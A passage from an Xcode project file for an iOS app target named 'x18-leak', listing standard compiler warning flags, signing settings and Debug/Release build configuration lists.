CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 245 | CLANG_WARN_BOOL_CONVERSION = YES; 246 | CLANG_WARN_COMMA = YES; 247 | CLANG_WARN_CONSTANT_CONVERSION = YES; 248 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 249 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 250 | CLANG_WARN_EMPTY_BODY = YES; 251 | CLANG_WARN_ENUM_CONVERSION = YES; 252 | CLANG_WARN_INFINITE_RECURSION = YES; 253 | CLANG_WARN_INT_CONVERSION = YES; 254 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 255 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 256 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 257 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 258 | CLANG_WARN_STRICT_PROTOTYPES = YES; 259 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 260 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 261 | CLANG_WARN_UNREACHABLE_CODE = YES; 262 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 263 | CODE_SIGN_IDENTITY = "iPhone Developer"; 264 | COPY_PHASE_STRIP = NO; 265 | DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; 266 | ENABLE_NS_ASSERTIONS = NO; 267 | ENABLE_STRICT_OBJC_MSGSEND = YES; 268 | GCC_C_LANGUAGE_STANDARD = gnu11; 269 | GCC_NO_COMMON_BLOCKS = YES; 270 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 271 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 272 | GCC_WARN_UNDECLARED_SELECTOR = YES; 273 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 274 | GCC_WARN_UNUSED_FUNCTION = YES; 275 | GCC_WARN_UNUSED_VARIABLE = YES; 276 | IPHONEOS_DEPLOYMENT_TARGET = 11.2; 277 | MTL_ENABLE_DEBUG_INFO = NO; 278 | SDKROOT = iphoneos; 279 | VALIDATE_PRODUCT = YES; 280 | }; 281 | name = Release; 282 | }; 283 | 5544C59C2044E240006514D9 /* Debug */ = { 284 | isa = XCBuildConfiguration; 285 | buildSettings = { 286 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 287 | CODE_SIGN_STYLE = Automatic; 288 | DEVELOPMENT_TEAM = DEEG7TTSF2; 289 | INFOPLIST_FILE = "x18-leak/Info.plist"; 290 | LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; 291 | PRODUCT_BUNDLE_IDENTIFIER = "com.github.bazad.x18-leak"; 292 | PRODUCT_NAME = "$(TARGET_NAME)"; 293 | TARGETED_DEVICE_FAMILY = "1,2"; 294 | }; 295 | name = Debug; 296 | }; 297 | 5544C59D2044E240006514D9 /* Release */ = { 298 | isa = XCBuildConfiguration; 299 | buildSettings = { 300 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 301 | CODE_SIGN_STYLE = Automatic; 302 | DEVELOPMENT_TEAM = DEEG7TTSF2; 303 | INFOPLIST_FILE = "x18-leak/Info.plist"; 304 | LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; 305 | PRODUCT_BUNDLE_IDENTIFIER = "com.github.bazad.x18-leak"; 306 | PRODUCT_NAME = "$(TARGET_NAME)"; 307 | TARGETED_DEVICE_FAMILY = "1,2"; 308 | }; 309 | name = Release; 310 | }; 311 | /* End XCBuildConfiguration section */ 312 | 313 | /* Begin XCConfigurationList section */ 314 | 5544C5802044E23F006514D9 /* Build configuration list for PBXProject "x18-leak" */ = { 315 | isa = XCConfigurationList; 316 | buildConfigurations = ( 317 | 5544C5992044E240006514D9 /* Debug */, 318 | 5544C59A2044E240006514D9 /* Release */, 319 | ); 320 | defaultConfigurationIsVisible = 0; 321 | defaultConfigurationName = Release; 322 | }; 323 | 5544C59B2044E240006514D9 /* Build configuration list for PBXNativeTarget "x18-leak" */ = { 324 | isa = XCConfigurationList; 325 | buildConfigurations = ( 326 | 5544C59C2044E240006514D9 /* Debug */, 327 | 5544C59D2044E240006514D9 /* Release */, 328 | ); 329 | defaultConfigurationIsVisible = 0; 330 | defaultConfigurationName = Release; 331 | }; 332 | /* End XCConfigurationList section */ 333 | }; 334 | rootObject = 5544C57D2044E23F006514D9 /* Project object */; 335 | } 336 | --------------------------------------------------------------------------------